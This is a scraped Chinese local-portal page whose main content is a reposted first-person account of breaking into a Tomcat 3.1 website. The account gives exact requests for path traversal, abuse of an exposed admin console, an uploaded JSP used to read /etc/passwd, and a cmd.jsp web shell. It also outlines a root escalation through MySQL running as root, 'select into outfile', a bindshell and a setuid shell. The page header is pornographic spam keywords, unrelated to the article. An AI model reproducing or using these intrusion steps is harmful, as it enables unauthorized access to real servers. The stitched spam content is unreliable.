亚洲免费精品一区二区三区|亚洲国产成人AⅤ片在线观看|国产精品亚洲二区在线看|日韩人妻无码精品

<source id="x8p8d"></source>
<tr id="x8p8d"><em id="x8p8d"></em></tr>

<label id="x8p8d"></label><pre id="x8p8d"></pre>
<source id="x8p8d"><del id="x8p8d"></del></source>
    • <noscript id="x8p8d"><delect id="x8p8d"></delect></noscript>

      • <rt id="x8p8d"><del id="x8p8d"><bdo id="x8p8d"></bdo></del></rt>
      • <li id="x8p8d"><th id="x8p8d"></th></li>

        1. 濟寧天氣預報
          濟寧市人力資源和社會保障局
          濟寧人事考試單位代碼
          濟寧市安全教育平臺
          濟寧違章查詢
          濟寧住房公積金查詢
          濟寧科技網 濟寧培訓班 濟寧銀行網上銀行 濟寧教育網 歷史故事 家庭教育 濟寧市地圖 濟寧房產 濟寧教育網 濟寧人事考試信息網 濟寧新聞網
          幣圈最新消息 濟寧信息港
          瀏覽器之家 濟寧汽車 睡前小故事
          下載吧 股票書籍 花花草草
          百應百科 照片恢復 學習通
          紅警之家 睡前小故事 馬伊琍
          手機照片恢復 手機數(shù)據(jù)恢復

          黑客攻擊技術 WEB網站入侵的全過程講述

          時間:2010-09-09 18:31來源:未知 www.habestpay.com.cn

          以下的文章主要向大家講述的是黑客攻擊技術WEB網站入侵的過程,很偶然的一個機會,看到了一個網站,頁面清新也很舒服的感覺。網站是用JSP開發(fā)的,由于個人的喜好,所以我決定看看系統(tǒng)的安全性。

          1. telnetwww.target.com8080 GET/CHINANSLHTTP/1.1
          2. [Enter] [Enter]
          3. 返回的結果如下: HTTP/1.0404NotFound
          4. Date:Sun,08Jul200107:49:13GMT Servlet-Engine:TomcatWebServer/3.1(JSP1.1;Servlet2.2;Java1.2.2;Linux2
          5. .2.12i386;java.vendor=BlackdownJava-LinuxTeam) Content-Language:en
          6. Content-Type:text/html Status:404
          7. Error:404 Location:/CHINANSLFileNotFound/CHINANSL

          我獲得了運行的WEBServer的名稱"Tomcat 3.1"。我記得我曾經發(fā)現(xiàn)過這個版本的漏洞,并且post到bugtrap上去過。大概是:通過".."技術可以退出WEB目錄,于是:

          1. http://target:8080/../../../../%00.jsp(不行) http://target:8080/file/index.jsp(不行)
          2. http://target:8080/index.JSP(不行) http://target:8080/index.jsp%81(不行)
          3. http://target:8080/index.js%70(不行) http://target:8080/index.jsp%2581(不行)
          4. http://target:8080/WEB-INF/(不行)

          嗯,在試試吧!Tomcat 3.1自帶了一個管理工具,可以查看WEB下的目錄及文件,并且可以添加context.試一下:http://target:8080/admin/ ,管理員果然沒有刪除或禁止訪問這個目錄。接著我點"VIEW ALL CONTEXT"按鈕,列出了WEB目錄下的一些文件和目錄的名稱,我開始仔細的看了起來,一小會兒,發(fā)現(xiàn)了一個上傳文件的組件,嘿嘿,寫一個jsp文件弄上去看看。幾口咖啡的時間,我寫了這么一個東東出來:

          通過上傳的組件將這個jsp上傳到對方的WEB目錄里,然后:

          http://target:8080/upload/test.jsp?file=/etc/passwd

          嘿嘿,密碼出來啦。我只看了"/etc/passwd",并沒有看"/etc/shadow",因為當時考慮webserver一般使用nobody的身份啟動的,看了也白看。(失誤)接下來的過程是無聊的猜測密碼,沒有成功。算了,那我只有將就點,反正現(xiàn)在我相當于有了一個shell了嘛,猜不出密碼上去,那就全當IE是我的SHELL環(huán)境吧!

          再寫:

          然后把這個jsp又通過upload上傳了上去,嘿嘿,我現(xiàn)在有個SHELL了。

          http://target:8080/upload/cmd.jsp?cmd=ls+-la+/

          (我這里就不列出來了)

          怎么獲得root呢?經過一番搜索我發(fā)現(xiàn)了系統(tǒng)安裝了mysql并且我從jsp的源代碼中得到了mysql的密碼:)看看是什么權限運行的mysql:

          1. sqld">http://target:8080/upload/cmd.jsp?cmd=ps+aux+ grep+mysqld

          顯示:

          1. root874940.21.9173004800p0-S28Jun015:54.72/usr/local/data/mysql

          嘿嘿,有辦法了,系統(tǒng)是以root身份運行的mysql,同時我知道了mysql的密碼,那我現(xiàn)在我可以寫一個shell程序,讓它create一個表,然后將我的數(shù)據(jù)放到表中,然后再使用"select ... into outfile;"的辦法在系統(tǒng)上創(chuàng)建一個文件,讓用戶在執(zhí)行su的時候,運行我的程序。(還記得apache.org有一次被WEB網站入侵嗎?hacker就采用的這種辦法)。

          然后,我再上傳bindshell之類的程序,運行、獲得nobody的權限,然后......再使用su root時幫忙創(chuàng)建的setuid shell讓自己成為root.嘿嘿,真是好辦法,我都為我的想法感到得意......

          相關閱讀
        2. 調查顯示大企業(yè)中只有33%未被黑客入侵
        3. 簡述主要的黑客入侵途徑及應對方法
        4. 通過交換機防范蠕蟲病毒入侵
        5. 黑客攻擊和入侵的八大常用手段有哪些?
        6. 黑客捕捉技術之網絡入侵追蹤方法
        7. SQL注入網站入侵實例演示
        8. 實例講述網絡社會工程學
        9. 黑客入侵也無間 盜走網吧20萬

        10. 上一篇:手動防御傳奇攻擊問題
          下一篇:閃存驅動器攻擊介質仍受黑客青睞

          濟寧運河畔網版權與免責聲明:

          ①凡本網來源于注明來“源于:運河畔或www.habestpay.com.cn”版權均屬運河畔網所有,其他媒體可以轉載,且需注明“來源運河畔網”
          ② 凡本網注明“來源:XXX(非濟寧運河畔,濟寧信息港)”的作品,均轉載自其它媒體,轉載目的在于傳遞更多信息,并不代表本網贊同其觀點和對其真實性負責。
          ③ 如因作品內容、版權和其它問題需要同本網聯(lián)系的,請在30日內進行。

          • 全網熱點
          • 健康
          • 教育
          • 新聞
          • 美食